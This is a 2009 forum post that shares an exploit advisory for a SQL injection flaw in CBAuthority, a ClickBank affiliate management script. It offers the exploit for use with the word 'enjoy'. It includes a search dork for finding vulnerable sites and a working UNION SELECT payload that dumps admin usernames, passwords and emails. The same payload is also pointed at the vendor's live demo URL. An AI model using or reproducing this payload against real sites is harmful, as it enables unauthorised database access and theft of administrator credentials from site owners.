1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

CBAuthority - ClickBank Affiliate Management SQL Injection Vulnerability

Discussion in 'General Scripting Chat' started by mercdrew, Aug 26, 2009.

  1. mercdrew

    mercdrew Newbie

    Joined:
    Aug 11, 2009
    Messages:
    14
    Likes Received:
    7
    enjoy
    Code:
    (o)===========================================================================================(o)
    
                     -:-          CBAuthority - ClickBank Affiliate Management SQL Injection Vulnerability       -:-
    
    
                Vendor : [URL]http://www.cbauthority.com/[/URL]
                Author  : Angela Chang
                Contact : [EMAIL="angel@ch4ng.cc"]angel@ch4ng.cc[/EMAIL]
                Date     : 17 august 2009
    
    (o)===========================================================================================(o)
    
    
    Dork   :
       
           Powered by CBAuthority
    
    
    Vulnerabilities   :
    
          [URL]http://localhost/path/main.php?command=view_product&id=-1[/URL] UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--
    
    
    
    Demo  :
    
    
          [URL]http://www.cbauthority.com/demo/main.php?command=view_product&id=-18[/URL] UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--
    
    
    
    
    (o)===========================================================================================(o)
    
    Greetz   :   -:-  SkyCreW  -:-
    
         Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   str0ke
    
    
    (o)===========================================================================================(o)